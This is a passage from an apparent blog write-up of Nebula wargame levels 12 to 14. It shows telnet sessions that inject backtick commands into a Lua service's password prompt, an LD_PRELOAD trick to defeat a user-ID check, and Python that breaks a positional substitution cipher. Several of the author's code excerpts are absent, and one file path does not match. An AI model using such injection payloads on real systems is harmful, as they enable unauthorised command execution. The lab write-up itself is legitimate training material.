After quite some time of not doing much more than working at my new job & playing dota, I felt like taking it upon myself to complete some more exercises. I had trouble with level 11, but who cares?
There is a backdoor process listening on port 50001.
Here’s an excerpt from the code provided.
So, we get to put in text for the Lua script to pass into the command line, but we have to deal with that pesky pipe into sha1sum at the end. However, the solution is to use the help of our old friend backticks to execute what we want.
```
$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: `getflag` > /tmp/level12
Better luck next time
Connection closed by foreign host.
$ cat /tmp/flag12
You have successfully executed getflag on a target account
```
Bonus: Getting two birds stoned at once.
We can fool this Lua script into accepting our bogus password as the real deal by adding one or two commands. All we need is the hash it's looking for & a way to give it to the program.
```
$ cat << EOF > /tmp/level12
4754a4f4bd5787accd33de887b9250a0691dd198
EOF
$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: `cat /tmp/level12`; exit
Congrats, your token is 413**CARRIER LOST**
Connection closed by foreign host.
```
Since sh -c is fed the exit command, it stops execution, resulting in the trailing ` | sha1sum` disappearing into the void. It's not the point of the exercise, but a neat thing I thought I'd share =)
There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.
Below is the provided C code.
Since we're not root, we can't change our user ID just like that. I tried to use LD_PRELOAD to change the getuid function to only return 1000, but my plans were stopped in their tracks because LD_PRELOAD is ignored by the loader if we're trying to preload on an executable we don't own.

However, we can just make a copy of the executable & preload it with our own version of getuid, making our hard work & sweat worthwhile.
## About

This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it :)
We have to pipe input into the process & pass along the -e flag for it to spit out encrypted stuff. I also added && echo since the program does not add a newline character at the end.

Fair enough, but does the encryption change if we rerun it? Turns out it doesn't; we still get hfnos if we run the program again with the same input. That's good to know: we don't necessarily have to get lucky when we try to recover the key that was used.
If we feed the program a lot of the same character, the results indicate that the encryption is basically encrypting one character at a time, incrementing the substitution each time.
In order to decrypt the token, we just need to unroll the substitution, which is simple enough. All we need to know is how long the token is & what order characters are substituted.
The first character remains unchanged by the encryption, so if we loop through all ASCII characters, we can map the order of substitution. I tried to throw down some quick & simple Python code to decrypt the token, according to what I knew about the encryption so far.

The problem is that my decryption did not work. My guess is that there is something I'm missing, so I wrote a similar Python script to brute-force it instead.
In a nutshell, the code above iterates over all characters in, trying a substitution & re-encrypting, comparing the re-encrypted ciphertext to the token. If the re-encrypted string matches the token so far, it just adds that decrypted character to the variable & moves on to the next character in token. If it doesn't match, the script modifies the iv variable, meaning that in the next iteration our loop will try with another character from
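As an added example (not the author's missing scripts), the cipher described above modelled as a byte shifted by its position, with the direct inverse and the re-encrypt-and-compare brute force the paragraph describes. The modulo-256 wraparound and the sample plaintext "hello" are assumptions; under them "hello" encrypts to the hfnos observed earlier.

```python
import string

# Assumed model of the level 14 cipher: byte i of the plaintext is
# shifted by i, wrapping at 256 (the wraparound is an assumption, not
# something the write-up states).

def encrypt(plaintext: bytes) -> bytes:
    """First byte unchanged, every following byte shifted by its index."""
    return bytes((b + i) % 256 for i, b in enumerate(plaintext))


def decrypt(ciphertext: bytes) -> bytes:
    """Direct inverse: undo the positional shift byte by byte."""
    return bytes((b - i) % 256 for i, b in enumerate(ciphertext))


def brute_force(token: bytes, alphabet: bytes = string.printable.encode()) -> bytes:
    """Brute force as the write-up describes it: for each position try every
    candidate character, re-encrypt the recovered prefix plus the candidate,
    and keep the candidate whose ciphertext matches the token so far."""
    recovered = b""
    for pos in range(len(token)):
        for candidate in alphabet:
            trial = recovered + bytes([candidate])
            if encrypt(trial) == token[: pos + 1]:
                recovered = trial
                break
        else:
            # Edge case: the token byte is not a printable character under
            # this model, so the alphabet needs widening to all 256 bytes.
            raise ValueError(f"no printable plaintext byte at position {pos}")
    return recovered


if __name__ == "__main__":
    ct = encrypt(b"hello")  # constructed sample input
    print(ct)                       # b'hfnos'
    print(decrypt(ct), brute_force(ct))
```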
With my brute-forcing script in place, all that was left was to actually put all the pieces together & execute the flag as
Recommended stuff to watch & read in regards to this level.
There you have it. I've tried solving level15 & level16, but have been unable to, so far. This Unix shell exploiting is really tricky sometimes, but it's pretty fun trying to figure out what the fuck is going on.

Thanks for reading. I'll maybe just switch over to their Protostar series of challenges, I'm not sure right now :)